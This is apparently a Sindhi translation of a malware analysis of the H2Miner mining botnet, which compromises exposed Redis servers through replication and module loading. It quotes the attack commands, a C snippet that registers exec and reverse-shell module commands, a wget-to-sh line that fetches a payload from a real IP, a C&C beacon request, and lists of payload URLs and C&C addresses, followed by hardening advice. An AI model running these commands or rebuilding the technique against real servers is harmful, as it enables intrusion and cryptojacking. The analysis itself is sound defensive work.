هڪ ڏينهن اڳ، منهنجي پروجيڪٽ جي سرورز مان هڪ ساڳئي ڪيم پاران حملو ڪيو ويو. سوال جي جواب جي ڳولا ۾ "اهو ڇا هو؟" مون کي علي بابا ڪلائوڊ سيڪيورٽي ٽيم پاران هڪ بهترين مضمون مليو. جيئن ته مون کي هي مضمون Habré تي نه مليو، مون ان کي ترجمو ڪرڻ جو فيصلو ڪيو خاص طور تي توهان لاءِ <3
جائز آهي
تازو، علي بابا ڪلائوڊ جي سيڪيورٽي ٽيم H2Miner جي اوچتو وباء کي دريافت ڪيو. هن قسم جو بدڪاري وارو ورم توهان جي سسٽم جي گيٽ ويز طور Redis لاءِ اختيار جي کوٽ يا ڪمزور پاسورڊ استعمال ڪري ٿو، جنهن کان پوءِ اهو ماسٽر-غلام جي هم وقت سازيءَ ذريعي غلام سان پنهنجو خراب ڪندڙ ماڊيول هم وقت سازي ڪري ٿو ۽ آخر ۾ هن بدنصيب ماڊيول کي حملي واري مشين ۾ ڊائون لوڊ ڪري ٿو ۽ بدسلوڪي تي عمل ڪري ٿو. هدايتون.
ماضي ۾، توهان جي سسٽم تي حملا بنيادي طور تي هڪ طريقو استعمال ڪندي ڪيا ويا هئا جن ۾ شيڊول ٿيل ڪم يا SSH ڪيز شامل هئا جيڪي توهان جي مشين تي لکيا ويا هئا حملي ڪندڙ جي Redis ۾ لاگ ان ٿيڻ کان پوءِ. خوشقسمتيء سان، هي طريقو اڪثر ڪري استعمال نه ٿو ڪري سگھجي ڇاڪاڻ ته اجازت جي ڪنٽرول سان مسئلن جي ڪري يا مختلف سسٽم نسخن جي ڪري. بهرحال، هي طريقو بدسلوڪي ماڊل لوڊ ڪرڻ جو سڌو سنئون حملو ڪندڙ حڪمن تي عمل ڪري سگهي ٿو يا شيل تائين رسائي حاصل ڪري سگهي ٿو، جيڪو توهان جي سسٽم لاء خطرناڪ آهي.
انٽرنيٽ تي ميزباني ڪيل ريڊيس سرورز جي وڏي تعداد (تقريبن 1 ملين) جي ڪري، علي بابا ڪلائوڊ جي سيڪيورٽي ٽيم، هڪ دوستانه ياد ڏياريندڙ جي طور تي، صارفين کي سفارش ڪري ٿي ته ريڊس آن لائن شيئر نه ڪن ۽ باقاعدگي سان انهن جي پاسورڊ جي طاقت کي چيڪ ڪريو ۽ ڇا انهن سان سمجھوتو ڪيو ويو آهي. جلدي چونڊ.
H2 Miner
H2Miner لينڪس جي بنياد تي سسٽم لاء هڪ مائننگ botnet آهي جيڪو توهان جي سسٽم تي مختلف طريقن سان حملو ڪري سگهي ٿو، بشمول Hadoop يارن، Docker، ۽ Redis remote command execution (RCE) خطرات ۾ اختيار جي کوٽ شامل آهن. A botnet ڪم ڪري ٿو بدسلوڪي اسڪرپٽس ۽ مالويئر کي ڊائون لوڊ ڪندي توهان جي ڊيٽا کي مائن ڪرڻ لاءِ، حملي کي افقي طور تي وڌايو، ۽ ڪمانڊ اينڊ ڪنٽرول (C&C) ڪميونيڪيشن کي برقرار رکي.
ريڊيس آر سي اي
هن موضوع تي ڄاڻ Pavel Toporkov طرفان ZeroNights 2018 ۾ شيئر ڪئي وئي. ورجن 4.0 کان پوءِ، Redis هڪ پلگ ان لوڊ ڪرڻ جي خصوصيت کي سپورٽ ڪري ٿو جيڪا صارفين کي لوڊ ڪرڻ جي صلاحيت ڏئي ٿي ته جيئن مخصوص Redis حڪمن تي عمل ڪرڻ لاءِ ريڊيس ۾ C سان گڏ ڪيل فائلون. هي فنڪشن، جيتوڻيڪ ڪارائتو، هڪ نقصان تي مشتمل آهي، جنهن ۾، ماسٽر-غلام موڊ ۾، فائلن کي غلام سان هم وقت سازي ڪري سگهجي ٿو fullresync موڊ ذريعي. اهو هڪ حملي ڪندڙ طرفان استعمال ڪري سگهجي ٿو بدسلوڪي فائلن کي منتقل ڪرڻ لاء. منتقلي مڪمل ٿيڻ کان پوء، حملو ڪندڙ ماڊل کي حملو ٿيل ريڊس مثال تي لوڊ ڪن ٿا ۽ ڪنهن به حڪم تي عمل ڪريو.
مالويئر ورم تجزيو
تازو، علي بابا ڪلائوڊ سيڪيورٽي ٽيم دريافت ڪيو ته H2Miner بدسلوڪي منر گروپ جي سائيز اوچتو ڊرامائي طور تي وڌي وئي آهي. تجزيي موجب، حملي جي واقعن جو عام عمل هن ريت آهي:
H2Miner استعمال ڪري ٿو RCE Redis مڪمل حملي لاءِ. حملو ڪندڙ پهريان غير محفوظ ريڊس سرورز يا سرورز تي ڪمزور پاسورڊ سان حملو ڪندا آهن.
پوء اھي حڪم استعمال ڪندا آھن config set dbfilename red2.so فائل جو نالو تبديل ڪرڻ لاء. ان کان پوء، حملو ڪندڙ حڪم تي عمل ڪن ٿا slaveof ماسٽر-غلام ريپليڪشن ميزبان ايڊريس کي سيٽ ڪرڻ لاء.
جڏهن حملو ٿيل ريڊس مثال هڪ ماسٽر-غلام ڪنيڪشن قائم ڪري ٿو بدسلوڪي ريڊس سان جيڪو حملو ڪندڙ جي ملڪيت آهي، حملو ڪندڙ فائلن کي هم وقت سازي ڪرڻ لاءِ fullresync ڪمانڊ استعمال ڪندي متاثر ٿيل ماڊل موڪلي ٿو. red2.so فائل وري حملي واري مشين تي ڊائون لوڊ ڪيو ويندو. حملو ڪندڙ پوءِ استعمال ڪندا آهن ./red2.so لوڊ ڪرڻ وارو ماڊل هن فائل کي لوڊ ڪرڻ لاءِ. ماڊل هڪ حملي ڪندڙ کان حڪم جاري ڪري سگهي ٿو يا حملي واري مشين تائين رسائي حاصل ڪرڻ لاءِ ريورس ڪنيڪشن (بيڪ ڊور) شروع ڪري سگهي ٿو.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
بدسلوڪي حڪم تي عمل ڪرڻ کان پوء جيئن / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1، حملو ڪندڙ بيڪ اپ فائل جو نالو ري سيٽ ڪندو ۽ نشانن کي صاف ڪرڻ لاءِ سسٽم ماڊل کي لوڊ ڪندو. بهرحال، red2.so فائل اڃا تائين حملي واري مشين تي رهندي. صارفين کي صلاح ڏني وئي آهي ته انهن جي Redis مثال جي فولڊر ۾ اهڙي مشڪوڪ فائل جي موجودگي تي ڌيان ڏيو.
وسيلن کي چوري ڪرڻ لاء ڪجهه بدسلوڪي عمل کي مارڻ کان علاوه، حملي ڪندڙ بدسلوڪي بائنري فائلن کي ڊائون لوڊ ۽ عمل ڪندي بدسلوڪي اسڪرپٽ جي پيروي ڪئي. . ان جو مطلب اهو آهي ته پروسيس جو نالو يا ڊاريڪٽري جو نالو جنهن ۾ هوسٽ تي ڪنسنگ شامل آهي اهو ظاهر ڪري ٿو ته اها مشين هن وائرس کان متاثر ٿي وئي آهي.
ريورس انجنيئرنگ نتيجن جي مطابق، مالويئر بنيادي طور تي هيٺيان ڪم انجام ڏئي ٿو:
- فائلون اپلوڊ ڪرڻ ۽ انهن تي عمل ڪرڻ
- کان کني
- سي ۽ سي مواصلات کي برقرار رکڻ ۽ حملي ڪندڙ حڪمن تي عمل ڪرڻ
پنهنجي اثر کي وڌائڻ لاءِ ٻاهرين اسڪيننگ لاءِ ماسڪين استعمال ڪريو. ان کان علاوه، C&C سرور جو IP پتو پروگرام ۾ سخت-ڪوڊ ٿيل آهي، ۽ حملو ڪيل ميزبان HTTP درخواستن کي استعمال ڪندي C&C ڪميونيڪيشن سرور سان رابطو ڪندو، جتي زومبي (سمجھوتي ڪيل سرور) معلومات HTTP هيڊر ۾ سڃاڻي ويندي آهي.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
ٻيا حملا طريقا
ائڊريس ۽ ڳنڍيون ڪتب آنديون
/ نزاڪت
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
ھدايت
پهريون، Redis انٽرنيٽ تان رسائي نه هجڻ گهرجي ۽ هڪ مضبوط پاسورڊ سان محفوظ ڪيو وڃي. اهو پڻ ضروري آهي ته گراهڪ چيڪ ڪن ته ريڊس ڊاريڪٽري ۾ ڪا به red2.so فائل ناهي ۽ ميزبان تي فائل/پروسيس جي نالي ۾ ڪا به ”ڪنسنگ“ ناهي.
جو ذريعو: www.habr.com